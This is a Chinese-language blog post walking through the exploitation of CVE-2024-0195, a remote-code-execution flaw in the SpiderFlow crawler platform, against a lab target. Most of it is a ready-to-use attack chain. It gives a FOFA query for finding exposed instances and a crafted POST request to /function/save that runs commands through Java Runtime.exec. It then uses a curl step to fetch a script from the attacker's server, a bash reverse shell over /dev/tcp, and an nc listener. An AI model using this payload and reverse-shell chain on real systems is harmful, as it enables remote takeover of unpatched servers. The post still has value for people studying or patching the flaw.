首页 > 其他分享 >SpiderFlow RCE漏洞(CVE-2024-0195)

SpiderFlow RCE漏洞(CVE-2024-0195)

时间:2024-07-18 15:57:56浏览次数:22  
标签:shell http 漏洞 2024 SpiderFlow sh RCE com xxxxx

0x01 前言

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
影响范围:

  • Up to (including) <= 0.5.0

漏洞搜索:

# fofa 语法
app="SpiderFlow"

复现准备:

  • 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com/
  • 公网服务器:10.10.10.1

0x02 复现

1. 抓包

根据漏洞说明找到漏洞的具体位置,输入内容进行抓包
image.png
image.png

2. POC

修改 script 参数:

POST /function/save HTTP/1.1
Host: xxxxx.cloudeci1.ichunqiu.com:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://xxxxx.cloudeci1.ichunqiu.com:8088
Connection: close
Referer: http://xxxxx.cloudeci1.ichunqiu.com:8088/function-edit.html
Priority: u=0

id=&name=cmd&parameter=&script=}Java.type('java.lang.Runtime').getRuntime().exec('whoami');{

再次发送,显示 200 执行成功,但是并无回显。
image.png

3. 端口监听

# 建立 http 服务对 80 端口进行监听
python3 -m http.server 80

image.png
编写 shell.sh 脚本文件,将该文件放入 http 服务监听的目录下,通过 RCE 漏洞让靶机执行 curl 命令下载该文件。shell.sh 文件内容如下:

#!/bin/bash
bash -i >& /dev/tcp/10.10.10.1/4444 0>&1

4. 上传脚本

id=&name=cmd&parameter=&script=}Java.type('java.lang.Runtime').getRuntime().exec('curl http://10.10.10.1:80/shell.sh -o shell.sh');{

5. 开启 4444 端口等待反弹

nc -lvvp 4444

image.png

6. 反弹 shell

让靶机执行脚本,此时,4444 端口监听得到 shell

id=&name=cmd&parameter=&script=}Java.type('java.lang.Runtime').getRuntime().exec('bash shell.sh');{

image.png

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

标签:shell,http,漏洞,2024,SpiderFlow,sh,RCE,com,xxxxx
From: https://blog.csdn.net/qq_45240382/article/details/140525453

相关文章

  • 过滤器(Filter)和拦截器(Interceptor)的执行顺序和区别
    https://www.cnblogs.com/kuotian/p/13176186.html过滤器FilterFilter有如下几个用处。Filter有如下几个种类。javax.servlet.Filter接口1.通过@WebFilter注解配置2.通过@Bean来配置3.SpringMVC在web.xml配置过滤器启动测试拦截器InterceptorHandlerIn......
  • 2024最新的AI绘画工具 Stable Diffusion 整合包安装教程,SD安装分享(附整合包)
    大家好,我是灵魂画师向阳自从AI绘画开始进入大众视野之后,AI绘画工具StableDiffusion技术以其创新的人工智能能力而著称,它拥有根据用户输入的文字描述来创造细致且富有表现力的图像的独特本领。SD不仅能够生成图像,还能执行图像修复、扩展以及在文本指导下的图像变换等多样......
  • 2024北京国际智能工厂及自动化展览会亮点前瞻
    随着“工业创新,智造未来”的浪潮席卷而来,2024年度北京国际智能工厂及自动化与工业装配展览会定于8月1日至3日在中国国际展览中心(顺义新馆)盛大开幕。本次展会汇聚了智能制造与自动化技术的最新成果,通过三展联动的创新模式,搭建了一个集展示、交流、合作于一体的国际化平台。在“......
  • Amazon Science 团队计划于VLDB 2024 (August 26-30 2024) 发布 redset 数据集
    数据集介绍        Redset是一个数据集,包含了三个月的AWSRedshiftfleet 中选定实例样本上运行的用户查询元数据。数据集用途    AmazonScience团队打算在VLDB2024期间开放该部分数据,虽然目前数据集还没有开放,但是从数据集的Schema来看,和在VLDB2024......
  • |行业洞察·汽车|《2024智能不是中国购车用户的主要关注点-购车关注度洞察报告》
    主要内容包括以下几个方面:价格战影响:2023年,中国车市价格战激烈,整体优惠幅度上升,价格成为购车用户最关注的因素。购车用户关注度TOP10:价格、品牌、品质、安全、口碑、能耗、空间、服务、配置、舒适是购车用户关注度前十的因素,智能化不在其中。|趋势洞察库|关注我......
  • Origin2024如何绘制误差棒图?直观看出每个数据点的误差
    误差棒图,是一种体现实验数据误差以及不确定性的统计图,在视觉上辅助读者直观地看到每个数据点的误差范围。下面通过均值和标准差两个指标绘制误差棒图,它由折线和误差棒组成,均值决定了折线趋势,标准差的大小决定了误差棒的长短(高低)。操作步骤:1、先打开Origin2024软件,然后在Book1......
  • 2024年7月中国数据库排行榜:PolarDB独领云风骚,达梦跨越新巅峰
    在7月发布的中国数据库流行度排行榜中,各大国产数据库厂商在不同领域表现势如破竹,PolarDB以800分刷新记录,并在SIGMOD2024上获得“最佳论文奖”;OceanBase通过商业模式调整,展现了更加独立的市场竞争力;openGauss在开发者大会上推出“结队计划”,加强社区合作,推动技术进步…但最引人瞩......
  • 2024 最新域名价格查询 All In One
    2024最新域名价格查询AllInOne域名注册价格/域名续费价格产品名称注册1年\3年\5年\10年续费1年\3年\5年\10年转入赎回.xyz域名14元172元330元725元79元237元395元790元79元500元demoshttps://xgqfrms.xyz/https://cdn.xgq......
  • 【2024最新】4000字搞懂sora!一张脑图贯穿!
    话不多说,上图!下面就是对sora的具体阐释:Sora是OpenAI推出的一款革命性的视频生成模型,能够根据文本指令、静态图像或视频生成长达60秒的完整视频。这一模型基于扩散式模型和自注意力深度学习机制,通过将视频片段转换为静态图像并去除噪音以达到清晰效果。核心技术与功能技术架构......
  • 2024年还能入局网络安全吗?
    2024年:网络安全的黄金时代随着数字时代的迅猛发展,网络安全已经成为全球关注的焦点。2024年,我们站在了一个全新的起点,网络安全不再是一个可有可无的选项,而是企业和个人都必须严肃对待的课题。1.网络安全的现状网络安全是一个持续变化的领域。随着物联网(IoT)、云计算、大......